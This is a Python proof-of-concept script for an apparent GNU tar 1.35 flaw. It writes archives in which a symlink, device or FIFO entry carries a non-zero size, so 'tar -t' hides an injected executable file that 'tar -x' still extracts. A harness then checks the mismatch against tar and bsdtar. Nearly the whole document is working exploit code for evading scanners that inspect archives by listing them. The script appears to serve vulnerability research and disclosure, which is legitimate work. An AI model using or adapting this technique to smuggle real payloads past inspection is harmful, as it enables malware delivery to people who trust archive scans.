#!/usr/bin/env python3
"""
Minimal PoC: GNU tar stream desynchronization (listing vs extraction mismatch).

GNU tar 1.35 handles non-data-bearing typeflags (symlink, chardev, blockdev, FIFO)
with non-zero size fields differently in listing (-t) vs extraction (-x) mode:

  - tar -t: skips `size` bytes of data blocks (treats them as payload to skip)
  - tar -x: ignores the size field entirely and parses the next block as a header

This allows crafting archives where `tar -t` reports N entries but `tar -x`
creates N+M files. The extra files are completely invisible to listing.

Impact: Any security scanner that relies on `tar -t` (or equivalent listing API)
to inspect archive contents before extraction will miss injected files.

Affected: GNU tar 1.35 (and likely earlier versions)
Not affected: bsdtar 3.7.2 (libarchive) — consistent in both modes

Usage:
    python3 cve_desync_poc.py              # Generate PoC archives
    python3 cve_desync_poc.py --verify     # Generate + verify with tar/bsdtar

The PoC generates archives for all four vulnerable typeflags (2,3,4,6).
"""

import struct
import time
import os
import sys
import subprocess

BLOCK = 512


def make_header(name, size=0, mode=0o644, typeflag=b'0', linkname=b'',
                devmajor=b'0000000\x00', devminor=b'0000000\x00'):
    """Build a minimal valid POSIX tar header."""
    if isinstance(name, str):
        name = name.encode()
    if isinstance(typeflag, str):
        typeflag = typeflag.encode()
    if isinstance(linkname, str):
        linkname = linkname.encode()

    h = bytearray(BLOCK)
    h[0:len(name)] = name[:100]
    h[100:107] = b'%07o' % mode
    h[108:115] = b'%07o' % 0       # uid
    h[116:123] = b'%07o' % 0       # gid
    h[124:135] = b'%011o' % size
    h[136:147] = b'%011o' % int(time.time())
    h[156:157] = typeflag[:1]
    h[157:157+len(linkname)] = linkname[:100]
    h[257:263] = b'ustar\x00'
    h[263:265] = b'00'
    h[265:269] = b'root'
    h[297:301] = b'root'

    if devmajor:
        if isinstance(devmajor, str):
            devmajor = devmajor.encode()
        h[329:329+len(devmajor)] = devmajor[:8]
    if devminor:
        if isinstance(devminor, str):
            devminor = devminor.encode()
        h[337:337+len(devminor)] = devminor[:8]

    # Compute checksum
    h[148:156] = b'        '
    chksum = sum(h) & 0x1FFFF
    h[148:156] = b'%06o\x00 ' % chksum
    return bytes(h)


def pad512(data):
    """Pad data to 512-byte boundary."""
    if len(data) % BLOCK:
        data += b'\x00' * (BLOCK - len(data) % BLOCK)
    return data


def make_desync_archive(carrier_typeflag, carrier_name=b'carrier_entry'):
    """
    Build a tar archive that exploits the listing/extraction desync.

    Structure:
        [carrier_header]     typeflag=carrier_typeflag, size=len(injected)
        [injected_header]    typeflag='0' (regular file), name='injected.txt'
        [injected_data]      content of injected.txt
        [marker_header]      typeflag='0', name='marker.txt'
        [marker_data]        content of marker.txt
        [end-of-archive]     two zero blocks

    Behavior:
        tar -t:  carrier_entry, marker.txt           (2 entries — skips injected)
        tar -x:  carrier_entry, injected.txt, marker.txt  (3 entries)
    """
    # The injected file that will be invisible to listing
    injected_content = b'#!/bin/sh\necho "This file is invisible to tar -t"\n'
    injected_header = make_header(name=b'injected.txt', size=len(injected_content), mode=0o755)
    injected_data = pad512(injected_content)

    # This is the "data" for the carrier entry
    fake_payload = injected_header + injected_data

    # Carrier header: non-data typeflag with size = len(fake_payload)
    carrier_header = make_header(
        name=carrier_name,
        typeflag=carrier_typeflag,
        size=len(fake_payload),
        linkname=b'/dev/null' if carrier_typeflag == b'2' else b'',
        devmajor=b'0000001\x00' if carrier_typeflag in (b'3', b'4') else b'0000000\x00',
        devminor=b'0000003\x00' if carrier_typeflag in (b'3', b'4') else b'0000000\x00',
    )

    # Marker file (verifies stream re-synchronization)
    marker_content = b'MARKER OK\n'
    marker_header = make_header(name=b'marker.txt', size=len(marker_content), mode=0o644)
    marker_data = pad512(marker_content)

    # End of archive
    end = b'\x00' * BLOCK * 2

    return carrier_header + fake_payload + marker_header + marker_data + end


def main():
    verify = '--verify' in sys.argv

    outdir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'payloads', 'cve_desync')
    os.makedirs(outdir, exist_ok=True)

    typeflags = [
        (b'2', 'symlink',  'desync_symlink.tar'),
        (b'3', 'chardev',  'desync_chardev.tar'),
        (b'4', 'blockdev', 'desync_blockdev.tar'),
        (b'6', 'FIFO',     'desync_fifo.tar'),
    ]

    print("GNU tar stream desynchronization PoC")
    print("=" * 60)

    for tf, name, filename in typeflags:
        path = os.path.join(outdir, filename)
        archive = make_desync_archive(tf)
        with open(path, 'wb') as f:
            f.write(archive)
        print(f"\n[{name}] {path} ({len(archive)} bytes)")

        if verify:
            for impl in ['tar', 'bsdtar']:
                # Listing
                try:
                    listing = subprocess.run(
                        [impl, '-tf', path],
                        capture_output=True, text=True, timeout=5
                    )
                    listed = [l for l in listing.stdout.strip().split('\n') if l]
                except FileNotFoundError:
                    print(f"  {impl}: not found, skipping")
                    continue
                except subprocess.TimeoutExpired:
                    print(f"  {impl} -t: TIMEOUT")
                    continue

                # Extraction
                extract_dir = f'/tmp/_desync_cve_{impl}'
                subprocess.run(['rm', '-rf', extract_dir], capture_output=True)
                os.makedirs(extract_dir, exist_ok=True)
                try:
                    extract = subprocess.run(
                        [impl, '-xf', path, '-C', extract_dir],
                        capture_output=True, text=True, timeout=5
                    )
                except subprocess.TimeoutExpired:
                    print(f"  {impl} -x: TIMEOUT")
                    continue

                # What actually got extracted
                extracted = []
                for root, dirs, files in os.walk(extract_dir):
                    for fn in files:
                        rel = os.path.relpath(os.path.join(root, fn), extract_dir)
                        extracted.append(rel)
                    for dn in dirs:
                        rel = os.path.relpath(os.path.join(root, dn), extract_dir)
                        extracted.append(rel + '/')

                has_injected_list = 'injected.txt' in listed
                has_injected_disk = 'injected.txt' in extracted

                desync = (not has_injected_list) and has_injected_disk

                print(f"  {impl:<8} -t: {listed}")
                print(f"  {impl:<8} -x: {sorted(extracted)}")
                if desync:
                    print(f"  {impl:<8} *** DESYNC: injected.txt invisible to -t, created by -x ***")
                elif has_injected_list == has_injected_disk:
                    print(f"  {impl:<8} CONSISTENT (no desync)")

                subprocess.run(['rm', '-rf', extract_dir], capture_output=True)

    print(f"\n{'=' * 60}")
    print("Archives written to:", outdir)
    if not verify:
        print("Run with --verify to test against installed tar implementations.")


if __name__ == '__main__':
    main()
